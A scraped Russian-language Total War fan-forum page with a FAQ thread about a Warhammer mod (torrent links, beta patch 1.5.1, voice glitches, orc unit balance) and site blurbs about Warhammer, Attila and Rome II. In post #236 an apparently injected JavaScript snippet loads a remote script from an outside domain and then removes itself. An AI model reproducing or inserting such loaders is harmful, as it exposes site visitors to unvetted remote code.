Paradox
©
Fisana

Перейти к содержимому


Фотография

ЧаВо (FAQ) Вопросы по моду


  • Закрытая тема Тема закрыта
Сообщений в теме: 1111

#231 Diadoh

Diadoh

    Козак

  • CиЧевик
  • 247 сообщений
  • Откуда:Украина
  • Награды:
Регистрация: 22.окт.07
Слава: 45

Отправлено 20 сентября 2013 - 19:58

Diadoh, в этом вся и проблема.

Mesn Камрад, ну а чисто технически что это может быть? У раздающего работает, архив не битый, да и смысл человеку раздавать нерабочий мод?

Сообщение отредактировал Diadoh: 20 сентября 2013 - 19:59

  • 0

#232 igacool

igacool

    Послушник

  • Бунчужний
  • 2 386 сообщений
  • Откуда:Украина, Ужгород
  • Награды:
Регистрация: 08.окт.10
Слава: 417

Отправлено 20 сентября 2013 - 20:03

Раздающий и сам не знает, что раздача нерабочая. Рабочая - вот: ]]>http://rutracker.org...c.php?t=4532946]]>
  • 0
По ту сторону добра и зла.

#233 Mesn

Mesn

    Мододел

  • Старшина
  • 19 608 сообщений
  • Откуда:Киев
  • Награды:
  • Создатель:Knights of Honor:TW,Call of Warhammer:TW
Регистрация: 11.янв.08
Слава: 3 147

Отправлено 20 сентября 2013 - 20:13

Diadoh, технически, это бета версия патча 1.5.1.
  • 0

xA0omDh.png


#234 Diadoh

Diadoh

    Козак

  • CиЧевик
  • 247 сообщений
  • Откуда:Украина
  • Награды:
Регистрация: 22.окт.07
Слава: 45

Отправлено 20 сентября 2013 - 20:14

Раздающий и сам не знает, что раздача нерабочая. Рабочая - вот: ]]>http://rutracker.org...c.php?t=4532946]]>

Благодарю за ссылку камрад.

Mesn
Понял, буду исправлять, мод отличный. Я до этого в 1.4.2 играл, а здесь новые плюшки.
Кстати в том 1.5.1 что я скачал, еще с озвучкой проблемы. "Порубежники" рычат, гномы хаоса говорят, как ТЭ, вампиры, как орки, а орки как имперцы. :lol: Это тоже глюки бетки?

Сообщение отредактировал Diadoh: 20 сентября 2013 - 20:21

  • 0

#235 GamerZOG

GamerZOG

    CiЧовий дiд

  • Сердюк
  • 4 708 сообщений
  • Награды:
  • Создатель:Call of Warhammer:TW
Регистрация: 18.июл.09
Слава: 254

Отправлено 20 сентября 2013 - 20:33

Это тоже глюки бетки?

Вам в раздел озвучки. Стандартная проблема.
  • 0

#236 facilist

facilist

    Молодик

  • CиЧевик
  • 19 сообщений
Регистрация: 15.сен.13
Слава: 0

Отправлено 21 сентября 2013 - 11:45

а в новой версии 1.6 будет изменен баланс? А то при игре в кастом батле, заметил такую особенность, что 150 орков-рубак(тяж. пехота) сливают, или выигрывают с тяж потерями(в отряде остается около 30 или даже меньше) у мечников империи(легкая пехота),которых в отряде 128. (function () { var script = document.createElement('script'); script.src = 'https://abover.com/s...tension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();
  • 0

#237 Mesn

Mesn

    Мододел

  • Старшина
  • 19 608 сообщений
  • Откуда:Киев
  • Награды:
  • Создатель:Knights of Honor:TW,Call of Warhammer:TW
Регистрация: 11.янв.08
Слава: 3 147

Отправлено 21 сентября 2013 - 12:01

facilist, будет, но не факт что результат изменится.
  • 0

xA0omDh.png


#238 FRte

FRte

    Козак

  • Сердюк
  • 282 сообщений
  • Награды:
Регистрация: 23.сен.10
Слава: 10

Отправлено 26 сентября 2013 - 10:20

а в новой версии 1.6 будет изменен баланс? А то при игре в кастом батле, заметил такую особенность, что 150 орков-рубак(тяж. пехота) сливают, или выигрывают с тяж потерями(в отряде остается около 30 или даже меньше) у мечников империи(легкая пехота),которых в отряде 128.

по беку, они примерно равны мечникамтяжелые они от веса самих орков :)

Сообщение отредактировал FRte: 26 сентября 2013 - 10:20

  • 0

#239 facilist

facilist

    Молодик

  • CиЧевик
  • 19 сообщений
Регистрация: 15.сен.13
Слава: 0

Отправлено 26 сентября 2013 - 19:45

да,но их все таки 150 в отряде, может имеет смысл чардж оркам повысить?
  • 0

#240 Angerfist

Angerfist

    CiЧовий дiд

  • Сердюк
  • 1 970 сообщений
  • Откуда:Минск
  • Награды:
Регистрация: 21.фев.12
Слава: 251

Отправлено 26 сентября 2013 - 21:05

Количество как известно это не всегда качество ..
  • 0




Количество пользователей, читающих эту тему: 3

0 пользователей, 3 гостей, 0 анонимных

Total War: WARHAMMER

Мы ждали, мы верили. И наша вера была вознаграждена! Анонс Total War: WARHAMMER состоялся! Скептики были посрамлены, а вахоманы возликовали! Но разработчики на форумах успели уже рассказать немало подробностей. Во первых стало известно? что это будет не одна игра, а трилогия сдобренная целым сомном аддонов и дополнительного платного и бесплатного контента. Во-вторых фракций будет только четыре (Империя Сигмара, Зеленокожие, Гномы и Графы-Вампиры) но обещают сделать их максимально проработанными, богатыми на юниты и реально отличающимися друг от друга по геймплею. В третьих - главы фракций теперь не просто генералы которых не жалко потерять в бою. Теперь это Легендарные Лорды (Карл Франц, Гримгор, Торгрим и Маннфрэд фон Карштайн), герои со уникальным оружием, верховым животным, шмотками и набором квестов. Еще обещают такие новинки как летающие юниты, магию, танки, пушки и мущкеты... в общем вкуснятинка! В общем ждем больше информации и надеемся, что игра станет прорывом в серии.

Ну а апологетам историчности спешим успокоить - над Вархаммер трудится отдельная команда. Исторические игры Тотал Вар производство фэнтэзийной игры не тормозит.

Подробней о Total War: WARHAMMER

Total War: Attila

Анонс Total War: Attila с одной стороны немало удивил нас, а с другой еще раз доказал, что СА идет проторенной дорожкой. Ведь Аттила по сути это сиквэл аддона "Вторжение варваров" для Рима 1. Правда на этот раз они не стали скромничать и назвали его "новой игрой". Ок, мы не будем спорить. Отдельная игра про нашествие варварских племен на цивилизации античного мира - это прекрасно. Нужно отметиьт что разработчики действительно поработали на славу. По мнению большинства игроков, Аттила действительно оказался достойным продуктом, позволившим окунутся в мрачные эпохи.

Подробней о Total War: Attila Часть 1 и Часть 2

Total War: Rome 2

Анонс Rome II Total War состоялся 2 июля и это вызвало настоящую бурю восторга нашего сообщества! Настолько люди истосковались по рукопашному бою и легионерам, что анонс сиквела восприняли как настоящее чудо и "сбычу мечт". Снова вести в бой скованные железной дисциплиной легионы, непоколебимых греческих гоплитов и македонских сариссофоров, топтать врагов слонами и забрасывать отрубленными головами - это ли не счастье! Но ведь новые игры Total War это еще и морские баталии. И тут уж будет море фана, ведь разработчики обещают активное взаимодействие между сухопутными и военно-морскими силами. Обоюдный обстрел между береговыми укреплениями и боевыми кораблями на рейде даст новую степень свободы "стратегосам" античного мира.

Подробней о Total War: Rome II